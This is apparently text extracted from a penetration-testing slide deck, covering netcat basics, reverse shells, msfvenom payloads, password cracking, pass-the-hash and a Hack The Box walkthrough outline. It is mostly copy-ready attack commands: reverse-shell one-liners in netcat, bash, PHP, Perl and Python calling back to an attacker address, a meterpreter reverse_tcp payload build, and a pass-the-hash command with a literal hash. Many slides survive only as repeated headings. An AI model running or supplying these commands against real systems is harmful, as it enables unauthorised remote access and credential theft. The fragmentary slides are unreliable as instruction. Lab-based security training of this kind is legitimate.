Professional Documents
Culture Documents
Agenda
Introduction
Part I : Basic Command for Penetration tester
Part II : Information Gathering
Part III : Scanning
Part IV : Enumeration
Part V : Pre-Exploitation Password Attack
Part VI : Exploitation
Part VII : Privilege Escalation
Part VIII : Post-Exploitation
Introduction
Part I : Basic Command
for
Penetration tester
Kali Linux
Update and Upgrade Kali
#Checking apt source
kali# nano /etc/apt/sources.list
Tester Victim
10.10.10.20 10.10.10.10
[Unix OS]
Root# nc –vnlp 4444 –e /bin/bash
Connection testing with netcat
#Reverse
Tester Victim
10.10.10.20 10.10.10.10
kali# nc -vnlp 4444 [Windows OS]
C:\> nc.exe 10.10.10.20 4444 -e cmd.exe
[Unix OS]
Root#nc 10.10.10.20 4444 –e /bin/bash
Connection testing with netcat
#Upload File
Tester Victim
10.10.10.20 10.10.10.10
[Unix OS]
Root# nc –vnlp 4444 > file.txt
Connection testing with netcat
#Download File
Tester Victim
10.10.10.20 10.10.10.10
kali# nc 10.10.10.10 4444 > file.txt [Windows OS]
C:\>nc.exe –vnlp 4444 < file.txt
[Unix OS]
Root# nc –vnlp 4444 < file.txt
Reverse shell
#Reverse
Tester Victim
10.10.10.20 192.168.0.10
kali# nc -vnlp 443
Reverse shell
#Netcat-reverse shell
nc 10.10.10.20 443 -e /bin/sh
#Bash-reverse shell
bash -i >& /dev/tcp/10.10.10.20/443 0>&1
#PHP-reverse shell
php -r '$sock=fsockopen("10.10.10.20",443);exec("/bin/sh -i <&3 >&3 2>&3");'
Reverse shell
#Perl-reverse shell
perl -e 'use
Socket;$i="10.10.10.20";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(conne
ct(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S"
);exec("/bin/sh -i");};‘
#Python-reverse shell
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.1
0.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Tcpdump
kali# tcpdump -i eth0 –vv | grep -v 192.168.31.132
kali# tcpdump -i eth0 –w outfile.pcap
Tshark
kali# tshark
Information gathering
#tcpdump
Information gathering
#tshark
Information gathering
Capture Packets with Tshark
tshark -i eth0 -w capture-output.pcap
#Reverse
Tester Victim
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
Kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.117.137 LPORT=5555 -f exe -o
reverseshell.exe
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
kali# python -m SimpleHTTPServer 8000
Copy to file
Post Exploitation
#Crack with John the ripple
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Post Exploitation: Enabling Remote Desktop
Post Exploitation: Enabling Remote Desktop
Post Exploitation: Enabling Remote Desktop
Post Exploitation: Enabling Remote Desktop
Post Exploitation: Enabling Remote Desktop
Post Exploitation
#Pass the hash
pth-winexe -U administrator%"aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42"
//192.168.200.132 cmd.exe
Post Exploitation
#Token Impersonation
Post Exploitation
#Token Impersonation
Post Exploitation
#Token Impersonation
Hack The Box | Previse
Connect VPN
Player
OS : Kali Linux
OS : Linux
Hack The Box
Scan
Nmap - Port Scan
Enumeration
gobuster
Dirbuster
Exploit
Exploring the Admin Area and Source Code
netcat to my own machine
brute-forcin password
Privilege Escalation
SUID
Gitgub
git init --> Initialize a local Git repository
git clone --> Create a local copy of a remote repository
git clean --> Removes untracked files from the working directory
git commit --> Takes the staged snapshot and commits it to the project history
Pentest website list
https://www.exploit-db.com
https://www.revshells.com
https://guif.re/
https://gtfobins.github.io/
https://oscpnotes.infosecsanyam.in/
https://oscp.infosecsanyam.in/